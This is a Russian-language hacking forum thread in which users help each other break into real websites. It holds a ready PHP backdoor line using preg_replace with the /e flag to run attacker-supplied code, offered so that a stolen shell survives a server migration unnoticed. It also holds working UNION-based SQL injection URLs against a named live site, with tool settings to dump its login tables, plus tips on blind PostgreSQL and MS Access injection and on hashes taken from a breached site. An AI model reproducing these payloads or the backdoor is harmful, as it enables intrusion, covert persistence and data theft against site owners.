Ну там возможно просто два запроса что лишает возможности провести инъекцию с выводом данных, но никто не мешает раскрутить её посимвольно: Code: version(): PostgreSQL 8.2.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 (Gentoo 4.1.1-r3) current_database(): portal Кстати т.к. это ПостгриСКЛ, то синтаксис чуть чуть отличается, так что может тебе и удастся раскрутить её не как слепую. Смотри статьи: https://forum.antichat.ru/showthread.php?t=35599 - здесь немного рассказано про инъекции в скриптах, использующих PostgreSQL. https://forum.antichat.ru/thread19844.html - а здесь рассказано про работу со слепыми инъекциями.
Здравствуйте! Подскажите, пожалуйста: в скором времени с сервера, на котором сейчас стоит шелл, все файлы будут переносить на новый сервер, и, вероятно, мой шелл найдут. Пока есть возможность, хочется незаметно добавить в php-файл акой-нибудь, свой код, чтобы через него можно было залить шелл на новом сервере. Подскажите, какой код можно добавить в существующий php-файл не очень большого размера (строк 100), чтобы это было как можно меньше заметно разработчикам? функция system - отключена Спасибо!
Добавь строку: PHP: if(isset($_GET['act']) and iseet($_GET['id4'])) preg_replace("/55/e",$_GET['act'],$_GET['id4']); И обращайся к серву так: Code: script.php?id4=55&act=phpinfo(); script.php?id4=55&act=[PHPCODE] Сможешь выполнять php код. Помоему это достаточно компактный и безпалевный вариант троянизации скриптов.
>>Помоему это достаточно компактный и безпалевный вариант троянизации скриптов. Лучше уж тогда $_REQUEST["act"], post или cookie по безпалевней будут. Хотя вариантов море впринципе.
БД MS ACCESS Code: site.com/Def.asp?id=222+1,2,mail,4,5+from+costumers возникла такая проблема знаю имя табцицы и имя нужной колонки каким образом можно вывести инфу ? лимита там нет можно чем нибудь заменить ? where тоже воспользоваться не получаеться (( заранее спасибо
Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
ыыыы давно так не смеялся =) через xss ты не сможешь исполнить php код =), только яваскрипт на стороне клиента. Скорей бы школа..
http://forum.antichat.ru/showpost.php?p=836658&postcount=3099 отвечю сам на cвой вопрос нужно юзать select TOP X * from table выводит X стоку из table ) всем спасибо
Гг,ето мне уже обьяснили)) Ну хоть веселее стало те))И за школу не боись,день рождение дьявола будет уже скоро, до 1 числа есче 3 дня.... есле бы 3 месяца...
Всем снова здоавствуйте, такая проблема: при запросе _http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+TABLE_NAME,2,3,4+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+23,1/**/ получаем: если попробовать проработать таблицу 'cucca_logins': _http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1+union+select+COLUMN_NAME,2,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=cucca_logins+limit+23,1/**/ И опять получаем: с cucca_users таже истории Помогите пожалуйста, что я делаю не так?
во-первых, /**/ ты открыл комментарий и тут же его закрыл. измени /**/ на /* или -- во-вторых, возми в ковычки во втором запросе cucca_logins в-третьих, пропиши limit 1,10 для начала
с кавычками меня послали, LIMIT в данном случае значения не имеет, а замена /**/ на -- ни к чему не привела.
Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html) Настройки поставь Code: URL=http://www.lacucaracha.ee/index.php?mod=komm&return_params=mod%3Dnews&f_id=2&t_text=LAULUV%D5ISTLUSE%20FINAAL&h_id=-1{SQLINJ} Key=Unknown column Search key by=Found Close SQL=(ничего) и все. /* тут вообще не надо и без него работает. у меня работает и все находит.
спасибо большое, оказывается в запросе очипятывался =) Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально. Пасибки всем
попробуй с моими настройками может прокатит, то у меня столбцы показывает. Если не получиться, говори в какой таблице столбцы надо
помогите определить тип хеша Code: %C6%EF%23%5D%B6%E8%E9%3D%3B%A7%D0%A9%18%9FX%C1%13%08s%D5%B0%DAG%5CF%DFV%DA%0D%DE%BCe вот ещё один Code: 1%FC%D47__%F8%B97x%1E%3F8%212_%D1%FA%AA_%11o%D3%D2%21%3FK%06%B4%02U%24 двиг сайта с которого выдрал хеши самописный з.ы. хеши без пробелов
